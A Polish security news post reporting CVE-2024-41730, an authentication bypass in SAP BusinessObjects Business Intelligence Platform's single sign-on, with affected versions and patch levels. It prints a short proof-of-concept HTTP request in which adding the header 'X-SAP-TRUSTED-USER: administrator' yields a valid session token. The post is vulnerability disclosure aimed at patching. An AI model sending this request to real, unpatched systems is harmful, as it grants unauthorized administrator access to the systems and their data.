Preorder drugiego tomu książki sekuraka: Wprowadzenie do bezpieczeństwa IT. -15% z kodem: sekurak-book

Kolejny trywialny auth bypass – tym razem w SAP BusinessObjects Business Intelligence Platform

22 listopada 2024, 10:18 | W biegu | 0 komentarzy

TLDR:

  • Pojawiły się szczegóły dotyczące załatanej w sierpniu krytycznej podatności CVE-2024-41730 pozwalającej na ominięcie uwierzytelniania w Single Sign-On (SSO)
  • Brak odpowiedniego sprawdzenia powodował, że atakujący mógł otrzymać token uwierzytelniający z RESTowego API, a w efekcie dostęp do systemu oraz danych w nim przetwarzanych
  • Dotknięte są wersje ENTERPRISE 430 oraz ENTERPRISE 440

Niedawno opisywaliśmy jak dodanie nagłówka w Palo Alto pozwala na wykonanie kodu w PAN-OS w kontekście użytkownika root. Błąd wydaje się zabawny, gdyby nie poważne konsekwencje jego wykorzystania. Jak się okazuje, nie tylko urządzenia mające na celu zwiększenie bezpieczeństwa dopadają trywialne podatności, bo podobny błąd udało się znaleźć w oprogramowaniu SAP BusinessObjects Business Intelligence.

GET /biprws/logon/trusted HTTP/1.1
Host: SAP_BOBJ:6405
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Priority: u=0, i
X-SAP-TRUSTED-USER: administrator
Listing 1. PoC pokazujący dodanie nagłówka X-SAP-TRUSTED-USER: administrator (źródło: sap.com)

Dodanie nagłówka X-SAP-TRUSTED-USER z wartością administrator wystarczyło, aby otrzymać poprawny token sesyjny i uwierzytelnić się w aplikacji. Prawda, że piękne?

Producent informuje, że problem został załatany w następujących wydaniach:

  • SBOP BI PLATFORM SERVERS 4.3 – Patch Level SP005
  • SBOP BI PLATFORM SERVERS 2025 – Patch Level SP00
  • SBOP BI PLATFORM SERVERS 4.3 – Patch Level SP004

Użytkownikom jak zwykle zalecamy monitorowanie wydawanych biuletynów bezpieczeństwa oraz wdrożenie wymaganych łatek. Jak widać nie wszystkie proste błędy zostały jeszcze znalezione, więc jeśli zajmujecie się poprawianiem bezpieczeństwa produktów, poszukując podatności, to nie musicie skupiać się tylko i wyłącznie na tych bardziej skomplikowanych łańcuchach :) 

~fc

Spodobał Ci się wpis? Podziel się nim ze znajomymi:



Komentarze

Odpowiedz